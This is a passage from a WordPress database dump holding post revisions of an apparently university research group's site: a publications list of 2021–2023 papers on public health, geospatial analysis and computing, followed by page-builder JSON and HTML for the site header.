Ramisetty-Mikler, Aster Gebrekirstos, Asfawossen Asrat, Susan Wanjiru, Emiru Birhane. A multi-disciplinary framework to combat climate-induced desert locus breeding,\n                      upsurges and outbreaks in eastern Africa. AGU Fall Meeting Abstracts, 2023\n                      <br>\n                    </p>\n                    <p>\n                      <br>\n                    </p>\n                    <p><strong>2022</strong></p>\n                    <p>Atkinson, S. F., Kala, A. K., &amp; Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\n                    <p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and&nbsp;Community Level Factors Related to Sanitation, Water Quality, Treatment\n                      and Management in Rural Communities in Accra, Ghana: A Field Study Report.</p>\n                    <p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Garland, R. 2022.&nbsp;GSU (Georgia State University) Contact Networks and Interventions.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at:\n                      American Association of Geographers, Annual Meeting 2022.</p>\n                    <p>\n                      <br>\n                    </p>\n                    <p><strong>2021</strong></p>\n                    <p>Northeim, K., Tiwari, C., &amp; Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science &amp; Policy, 126, 48-59.</p>\n                    <p>Gwalani, H., Tiwari, C., &amp; Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\n                    <p>Torres, A. V., Tiwari, C., &amp; Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\n                    <p>Northeim, K., Marks, C., &amp; Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\n                    <p>Haynes, D., &amp; Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\n                    <p>Oppong, J., &amp; Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\n                    <p>O’Neill, M., Poole, M., &amp; Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\n                    <p>Irany, F. A., Iyer, A., Flores, R. B., &amp; Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\n                    <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., &amp; Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\n                    <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., &amp; Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\n                    <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., &amp; Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\n                      (pp. 1-6). IEEE.</p>\n                    <p>Rosen, A., Levin, B., &amp; Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\n                      (pp. 631-640). IEEE.</p>\n                    <p>Tharpe, B., Bourgeois, A. G., &amp; Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\n                      (pp. 505-506).</p>\n                    <p>Huang, Y., Li, W., Wang, J., Cai, Z., &amp; Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\n                    <p>Sidharthan, S., Ashok, A., &amp; Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\n                      (S3) Workshop (pp. 1-2).</p>\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n                    <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., &amp; Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\n                    <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., &amp; Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\n                    <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., &amp; Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence &amp; Computing, Advanced &amp; Trusted\n                      Computing, Scalable Computing &amp; Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n                    <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., &amp; Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\n                      Systems &amp; NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Publications','','inherit','closed','closed','','608-revision-v1','','','2024-11-07 14:48:27','2024-11-07 19:48:27','',608,'https://gsudice.dataconn.net/?p=1869',0,'revision','',0),(1870,1,'2024-11-07 14:48:27','2024-11-07 19:48:27','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2024-11-07 14:48:27','2024-11-07 19:48:27','',26,'https://gsudice.dataconn.net/?p=1870',0,'revision','',0),(1871,1,'2024-11-07 14:48:27','2024-11-07 19:48:27','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path 